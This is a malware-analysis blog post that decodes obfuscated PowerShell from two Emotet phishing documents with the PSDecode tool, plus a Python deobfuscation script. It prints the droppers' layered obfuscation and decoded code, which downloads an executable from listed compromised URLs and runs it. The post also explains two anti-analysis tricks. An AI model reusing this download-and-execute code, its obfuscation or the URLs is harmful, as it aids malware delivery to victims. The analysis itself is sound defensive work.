PSDecode, follow-on analysis of Emotet samples
In my analysis of an emotet sample, I came across PSDecode, and, after some back and forth with the author and a couple of updates, got it working on this sample. The tool is very cool. What follows is analysis of a different emotet phishing document similar to the other one I was looking at, as well as PSDecode output for the previous sample.
PSDecode
According to this blog post from the author, PSDecode was born out of emotet analysis. The idea is that he uses method overriding to change what expressions like Invoke-Expression do. So if, instead of running code, IEX now prints it to the screen, PSDecode is doing what I did manually in my previous analysis.
Given that emotet is called out by the author, and that emotet is well known for constantly changing to get ahead of defenses, it’s not surprising that the recent samples I’m playing with today cause it some issues. It’s always a game of cat and mouse.
File Info
I’ll look at a couple emotet samples here:
Filename | INV601213082839.doc
md5 | a463ce8f2c2a943e2396e49bfbdd687a
VT Link | virus total

Filename | Facture-impayee-30-mai#0730-04071885.doc
md5 | e6f329eef248d8124a8fa93316f54fd1
VT Link | virus total
INV601213082839.doc
Since I’ve already posted analysis of the other sample, I’ll start with this sample.
The VBA is very similar to the other sample, and it deobfuscates and runs a powershell one-liner:
PowersHeLL -WinDowsTyle hidden -e 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
Try PSDecode:
After installing PSDecode per the instructions on GitHub, and saving that powershell one-liner to a file, INV-powershell_base64.txt, I give it a whirl:
PS C:\Users\df> cat .\INV-powershell_base64.txt | PSDecode
Unfortunately, the window just dies.
Manually decoded Powershell
Since we can't run PSDecode on the sample above for some reason, let's base64 decode it manually. That gives the following:
$ cat INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d
&( $PShomE[4]+$pshoME[34]+'X') ( ((("{22}{136}{83}{112}{146}{124}{121}{127}{164}{159}{98}{139}{138}{23}{73}{150}{111}{93}{165}{167}{148}{13}{42}{7}{68}{126}{63}{32}{99}{176}{69}{14}{10}{35}{153}{91}{151}{175}{135}{4}{172}{70}{132}{0}{48}{61}{36}{8}{105}{11}{38}{5}{64}{51}{67}{24}{133}{152}{27}{78}{3}{50}{87}{169}{134}{33}{101}{15}{17}{174}{72}{1}{154}{88}{30}{71}{16}{53}{142}{95}{47}{115}{49}{156}{114}{149}{103}{166}{26}{57}{2}{55}{147}{12}{6}{122}{177}{90}{66}{161}{163}{44}{89}{65}{41}{109}{100}{74}{54}{143}{28}{79}{94}{77}{56}{120}{118}{144}{104}{173}{76}{145}{31}{46}{45}{96}{29}{86}{168}{160}{9}{130}{123}{171}{85}{81}{80}{141}{137}{52}{119}{82}{43}{97}{25}{75}{107}{110}{155}{20}{158}{18}{21}{102}{84}{106}{129}{58}{34}{40}{92}{170}{60}{125}{117}{62}{39}{157}{162}{140}{113}{108}{59}{131}{19}{116}{128}{37}"-f '1','/','p','/ssfm',');','/','e','1Df','d','oreac',' 8N','/D6yd','qu','f-obj','SB =','http://','http://','la','bg',';}','oSt','uibguNgE8D','8N','c1Df+1Df','ual-sou','g','VacH/@ht','.c','C ','+','zUz/','B + (1','.We','k','1Df','gnsa','ttp://od','}}','9x','f','In','Split(1D','ect','bguOadF','8','.','Df','h','D','w','/',':','8','he','N',':/',' 1DfN8','t','(',';','D','f
h','+1D','et','@http','/1Df.','inki','//vis',') System','N','NgADCX =','@','11.de','t1Df)',';8','uleE8D(8','8NgN',' +','om','= 8Ngenv:pu','{try{8NgYY','CX)','l','nsa','), 8NgS',' 8NgAD','1Dfe1','R','c','cr2K','m/th','d.ne','vo1D',' .','blic','t','ex1Df','Ib','-','bClien','@1Df)','J/@','(','/',' +','bods.co.uk','DC);','Nga',')','f','s','dom;8NgYYU =','d','gSDC','.d','-','cat','1Df','1','DDobguWn','M','= &(1D','st','(8Ng',' ','fk','.N','fn1Df+1Df','ch{','&','h','break',' ','nd','IK','3','g','.E','e','obj',')(8N','U','llmu','gSD','Df','S','asd','/com','w1Df+1D','e',' ran','xt(10000, 2821','s','das','Nt','fc.E8DT','orbs','e-It','r','1Dfw','f','ngride','em1Df','r/1','e1Df+','(1Dfne','RaY','1Df+1Df','Df);','p','f+1','asfc in','8',' ','nge20','3','t;8Ng','software.co')) -CREPLACE 'N8M',[cHAr]92-RePlaCe([cHAr]49+[cHAr]68+[cHAr]102),[cHAr]39-CREPLACE'E8D',[cHAr]34-RePlaCe '8Ng',[cHAr]36-RePlaCe([cHAr]98+[cHAr]103+[cHAr]117),[cHAr]96))
Anti-PSDecode technique 1 - unicode
The linux host is actually hiding something important in the previous output: this is actually a unicode string, as you can see when you view it in hexdump:
$ cat INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d | hexdump -C | head
00000000 26 00 28 00 20 00 24 00 50 00 53 00 68 00 6f 00 |&.(. .$.P.S.h.o.|
00000010 6d 00 45 00 5b 00 34 00 5d 00 2b 00 24 00 70 00 |m.E.[.4.].+.$.p.|
00000020 73 00 68 00 6f 00 4d 00 45 00 5b 00 33 00 34 00 |s.h.o.M.E.[.3.4.|
00000030 5d 00 2b 00 27 00 58 00 27 00 29 00 20 00 28 00 |].+.'.X.'.). .(.|
00000040 20 00 28 00 28 00 28 00 22 00 7b 00 32 00 32 00 | .(.(.(.".{.2.2.|
00000050 7d 00 7b 00 31 00 33 00 36 00 7d 00 7b 00 38 00 |}.{.1.3.6.}.{.8.|
00000060 33 00 7d 00 7b 00 31 00 31 00 32 00 7d 00 7b 00 |3.}.{.1.1.2.}.{.|
00000070 31 00 34 00 36 00 7d 00 7b 00 31 00 32 00 34 00 |1.4.6.}.{.1.2.4.|
00000080 7d 00 7b 00 31 00 32 00 31 00 7d 00 7b 00 31 00 |}.{.1.2.1.}.{.1.|
00000090 32 00 37 00 7d 00 7b 00 31 00 36 00 34 00 7d 00 |2.7.}.{.1.6.4.}.|
That actually breaks PSDecode. The author is looking into it, but for now we need another path. Luckily we can decode this ourselves very easily.
$ cat INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d > INV-powershell_decoded.txt
When I try to run PSDecode on this sample now, it just hangs. It turns out that the unicode string is breaking things. One way to get around this would be to convert the string to ascii. I like to do that with strings on linux:
$ cat INV-powershell_decoded.txt | strings -el > INV-powershell_decoded_ascii.txt
$ hexdump -C INV-powershell_decoded_ascii.txt | head -2
00000000 26 28 20 24 50 53 68 6f 6d 45 5b 34 5d 2b 24 70 |&( $PShomE[4]+$p|
00000010 73 68 6f 4d 45 5b 33 34 5d 2b 27 58 27 29 20 28 |shoME[34]+'X') (|
But better yet, in working with these samples, the author added a -u flag to PSDecode so that it can handle unicode strings natively. It still doesn't fix the problem when the top layer is ascii and the next layer is unicode, but it lets us move forward here without creating another file.
Anti-PSDecode technique 2 - new lines
When I started this analysis, there was another speedbump the emotet authors had thrown in that caused PSDecode not to work. The malware author inserted line breaks inside strings (between ' '). We can see this here:
$ cat INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d | hexdump -C | grep " 0a "
00000940 44 00 27 00 2c 00 27 00 66 00 0d 00 0a 00 68 00 |D.'.,.'.f.....h.|
00000950 27 00 2c 00 27 00 2b 00 31 00 44 00 27 00 2c 00 |'.,.'.+.1.D.'.,.|
The 0d 00 0a 00 is a classic line break, and appears as 'f\x0d\x0ah'. Because it sits inside ' ', the whole thing is still technically one line:
$ cat ../INV601213082839.doc/INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d | wc -l
1
This had broken PSDecode, but the author put out a new version on 5 June 2018 to fix that.
PSDecode - success
Now, try PSDecode on that powershell, and it works:
PS C:\Users\df> PSDecode -u .\INV-powershell_decoded.txt
############################## Layer 1 ##############################
&( $PShomE[4]+$pshoME[34]+'X') ( ((("{22}{136}{83}{112}{146}{124}{121}{127}{164}{159}{98}{139}{138}{23}{73}{150}{111}{93}{165}{167}{148}{13}{42}{7}{68}{126}{63}{32}{99}{176}{69}{14}{10}{35}{153}{91}{151}{175}{135}{4}{172}{70}{132}{0}{48}{61}{36}{8}{105}{11}{38}{5}{64}{51}{67}{24}{133}{152}{27}{78}{3}{50}{87}{169}{134}{33}{101}{15}{17}{174}{72}{1}{154}{88}{30}{71}{16}{53}{142}{95}{47}{115}{49}{156}{114}{149}{103}{166}{26}{57}{2}{55}{147}{12}{6}{122}{177}{90}{66}{161}{163}{44}{89}{65}{41}{109}{100}{74}{54}{143}{28}{79}{94}{77}{56}{120}{118}{144}{104}{173}{76}{145}{31}{46}{45}{96}{29}{86}{168}{160}{9}{130}{123}{171}{85}{81}{80}{141}{137}{52}{119}{82}{43}{97}{25}{75}{107}{110}{155}{20}{158}{18}{21}{102}{84}{106}{129}{58}{34}{40}{92}{170}{60}{125}{117}{62}{39}{157}{162}{140}{113}{108}{59}{131}{19}{116}{128}{37}"-f '1','/','p','/ssfm',');','/','e','1Df','d','oreac',' 8N','/D6yd','qu','f-obj','SB =','http://','http://','la','bg',';}','oSt','uibguNgE8D','8N','c1Df+1Df','ual-sou','g','VacH/@ht','.c','C ',,'zUz/','B + (1','.We','k','1Df','gnsa','ttp://od','}}','9x','f','In','Split(1D','ect','bguOadF','8','.','Df','h','D','w','/',':','8','he','N',':/',' 1DfN8','t','(',';','D','f h','+1D','et','@http','/1Df.','inki','//vis',') System','N','NgADCX =','@','11.de','t1Df)',';8','uleE8D(8','8NgN',' +','om','= 8Ngenv:pu','{try{8NgYY','CX)','l','nsa','), 8NgS',' 8NgAD','1Dfe1','R','c','cr2K','m/th','d.ne','vo1D',' .','blic','t','ex1Df','Ib','-','bClien','@1Df)','J/@','(','/',' +','bods.co.uk','DC);','Nga',')','f','s','dom;8NgYYU =','d','gSDC','.d','-','cat','1Df','1','DDobguWn','M','= &(1D','st','(8Ng','','fk','.N','fn1Df+1Df','ch{','&','h','break','','nd','IK','3','g','.E','e','obj',')(8N','U','llmu','gSD','Df','S','asd','/com','w1Df+1D','e',' ran','xt(10000, 2821','s','das','Nt','fc.E8DT','orbs','e-It','r','1Dfw','f','ngride','em1Df','r/1','e1Df+','(1Dfne','RaY','1Df+1Df','Df);','p','f+1','asfc in','8','','nge20','3','t;8Ng','software.co')) -CREPLACE 
'N8M',[cHAr]92-RePlaCe([cHAr]49+[cHAr]68+[cHAr]102),[cHAr]39-CREPLACE'E8D',[cHAr]34-RePlaCe '8Ng',[cHAr]36-RePlaCe([cHAr]98+[cHAr]103+[cHAr]117),[cHAr]96))
############################## Layer 2 ##############################
$nsadasd= &('new-object') random;$YYU = .('new-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX =' http://oddbods.co.uk/D6yd9x/@http://visual-sounds.com/ssfm/RpIKkJ/@http://lange2011.de/NtczUz/@http://hellmuth-worbs.de/RaYVacH/@http://comquestsoftware.com/thinkingrider/18cr2K/'.Split('@');$SDC = $env:public + '\' +$NSB + ('.exe');foreach($asfc in $ADCX){try{$YYU."DoWnlOadFIle"($asfc."ToStriNg"(), $SDC);&('Invoke-Item')($SDC);break;}catch{}}
############################## Actions ##############################
1. [System.Random] Generate random integer between 10000 and 282133 . Value returned: 128403
2. [System.Net.WebClient.DownloadFile] Download from: http://oddbods.co.uk/D6yd9x/
3. [System.Net.WebClient.DownloadFile] Save downloaded file to: C:\Users\Public\128403.exe
4. [Invoke-Item] Execute/Open: C:\Users\Public\128403.exe
The output provides the original obfuscated code, as well as the deobfuscated powershell, and a list of the actions it performs. The action list is pretty good, though it does miss the loop over the different stage-2 domains. Still, very cool!
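As an added illustration (not part of the original post and not PSDecode's own code), this Python script does by hand what PSDecode's first layer does for these samples: it base64-decodes the -e argument as UTF-16LE (technique 1), reassembles the "{i}{j}..." -f pieces while keeping a CRLF that sits inside a quoted piece (technique 2), and applies the -replace/-creplace chain of [cHAr] codes. The layer-1 text it runs on is a constructed stand-in with the same structure and token names as the sample above, not the real payload.

```python
import base64
import re

# One PowerShell operand: a 'single-quoted' string ('' escapes a quote) or a [cHAr]N+... sum.
OPERAND = r"(?:'(?:[^']|'')*'|\(?(?:\[char\]\d+\+?)+\)?)"

# Constructed stand-in for the emotet layer 1 (same shape, no real URLs): "{i}{j}" -f
# pieces, one carrying a CRLF, then the -replace chain restoring $ ' " and \ characters.
LAYER1 = (
    "&( $PShomE[4]+$pshoME[34]+'X') ( (((\"{1}{3}{4}{0}{2}\" -f "
    "'M1Df + 8NgNSB + (1Df.exe1Df);','8NgYYU = .(1Dfnew-ob',"
    "'8NgYYU.E8DDoWnlOadFIleE8D(8Ngasfc,\r\n 8NgSDC)',"
    "'ject1Df) System.Net.WebClient;','8NgSDC = 8Ngenv:public + 1DfN8'"
    ")) -CREPLACE 'N8M',[cHAr]92 -RePlaCe([cHAr]49+[cHAr]68+[cHAr]102),[cHAr]39"
    " -CREPLACE 'E8D',[cHAr]34 -RePlaCe '8Ng',[cHAr]36))"
)
# What the -e argument carries: base64 over the UTF-16LE encoding of the text.
ENCODED = base64.b64encode(LAYER1.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(b64):
    """-e is base64 of UTF-16LE text, hence the NUL byte after each char in the hexdump."""
    return base64.b64decode(b64).decode("utf-16-le")

def literal(tok):
    """Value of a quoted operand, or of a [cHAr]N chain like ([cHAr]49+[cHAr]68)."""
    tok = tok.strip()
    if tok.startswith("'"):
        return tok[1:-1].replace("''", "'")
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", tok, re.I))

def format_layer(layer):
    """Reassemble the -f format string, then apply the -replace/-creplace chain.
    [^'] in OPERAND spans newlines, so a CRLF inside a piece (technique 2) is kept."""
    args = OPERAND + r"(?:\s*,\s*" + OPERAND + r")*"
    m = re.search(r'"((?:\{\d+\})+)"\s*-f\s*(' + args + ")", layer, re.I)
    pieces = [literal(t) for t in re.findall(OPERAND, m.group(2), re.I)]
    text = "".join(pieces[int(i)] for i in re.findall(r"\{(\d+)\}", m.group(1)))
    chain = r"-(c?replace)\s*(" + OPERAND + r")\s*,\s*(" + OPERAND + ")"
    for op, pat, rep in re.findall(chain, layer[m.end():], re.I):
        value = literal(rep)  # bound here; re.sub would interpret "\" in a repl string
        flags = 0 if op.lower().startswith("c") else re.I  # -replace ignores case
        text = re.sub(re.escape(literal(pat)), lambda _: value, text, flags=flags)
    return text

def deobfuscate(b64):
    return format_layer(decode_encoded_command(b64))

if __name__ == "__main__":
    print(deobfuscate(ENCODED))
```

The real sample's -replace chain also maps 'bgu' to a backtick; the same loop handles any number of such pairs.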
Facture-impayee-30-mai#0730-04071885.doc
This sample is pretty much the same as the previous one. Here's the PSDecode output:
PS C:\Users\df> PSDecode -u .\Desktop\Facture-powershell_decoded.txt
############################## Layer 1 ##############################
InVoke-expReSsIoN(((("{13}{84}{37}{60}{97}{46}{15}{90}{93}{10}{111}{17}{20}{11}{96}{24}{38}{114}{33}{18}{91}{76}{32}{51}{65}{99}{30}{14}{28}{73}{26}{69}{41}{74}{77}{29}{63}{34}{47}{82}{102}{78}{50}{1}{43}{59}{54}{92}{21}{7}{80}{106}{8}{85}{31}{88}{52}{57}{61}{45}{22}{3}{103}{58}{64}{49}{0}{95}{56}{44}{105}{62}{110}{25}{55}{53}{67}{98}{107}{19}{70}{48}{94}{27}{75}{6}{9}{42}{81}{116}{113}{35}{71}{79}{12}{87}{86}{5}{108}{100}{104}{109}{16}{39}{115}{4}{89}{36}{101}{2}{72}{83}{68}{23}{66}{112}{40}" -f'd','p://','Gv)(','i','vInvoRGv+RG','T','foreac','7F/@http://wep','/I0ge4woC','h(m91','cRGv','m','Oa','m91ns','ent;m','Gv+RGveRGv',', ','Gv) ra','eRGv+RGvwRGv+',':public ','ndo','/4TQf','m/qU','C','1Y','net/M0','=','eR','9','ext(10','Net.WebCli','S/@','o','vn','33);m91','y{m91Y','RGv','dasd = &(R','YU = ','m91SDC);&','ch{}}','91nsad','asfc','knoc','asLB','onsports.co','R','A','91NSB','-design.','htt','bject','ttp://','Split(RGv@RGv','or','FNV/RGv.','/myk','l','L/@htt','.','Gv','ewist','@http://maddin','000, 2821','ps://aluga','RGv) Syst',')',');m91SDC ','D',' m','+ RGv5qwRGv + m','YU.diyDoA09W','m91','1NSB ','a','Gv);','-','sd.n',' ','nlA09','fun',' i','DCX = RGv','S','a','Y','iy(m91asfc.diy','dFIA09led','h','vkRGv+','+RGvw-ob','RGv','g','je',' + (RGv.exRGv+RGv','e',';m9','n','= m9','em.','rA09iA09','e-ItemR',' ','v','N','HL1/','ds.com','1env','oSt','gdiy()','g.','+RGvtR',';break;}cat','1ADCX){tr','.(RG','(RG','n m9'))-CrEPlAce ([chAr]53+[chAr]113+[chAr]119),[chAr]92 -REPlAcE'A09',[chAr]96-REPlAcE 'RGv',[chAr]39 -CrEPlAce 'm91',[chAr]36 -REPlAcE([chAr]100+[chAr]105+[chAr]121),[chAr]34))
############################## Layer 2 ##############################
$nsadasd = &('new-object') random;$YYU = .('new-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = ' http://knoc.org/4TQf7F/@http://wepfunds.com/I0ge4woCYS/@http://lewistonsports.com/qUivL/@https://aluga-design.de/mykasLBHL1/@http://madding.net/M0FNV/'.Split('@');$SDC = $env:public + '\' + $NSB + ('.exe');foreach($asfc in $ADCX){try{$YYU."DoWnlOadFIle"($asfc."ToStriNg"(), $SDC);&('Invoke-Item')($SDC);break;}catch{}}
############################## Actions ##############################
1. [System.Random] Generate random integer between 10000 and 282133 . Value returned: 79770
2. [System.Net.WebClient.DownloadFile] Download from: http://knoc.org/4TQf7F/
3. [System.Net.WebClient.DownloadFile] Save downloaded file to: C:\Users\Public\79770.exe
4. [Invoke-Item] Execute/Open: C:\Users\Public\79770.exe
Summary
PSDecode is a pretty awesome tool for seeing what obfuscated powershell is doing. It provides clear output at each layer of obfuscation, and provides a summary of what the code is doing. Identifying unicode text in the decode is a challenge, but one that we can easily work around since base64 decoding is easy. The author of the tool was also very responsive to issues.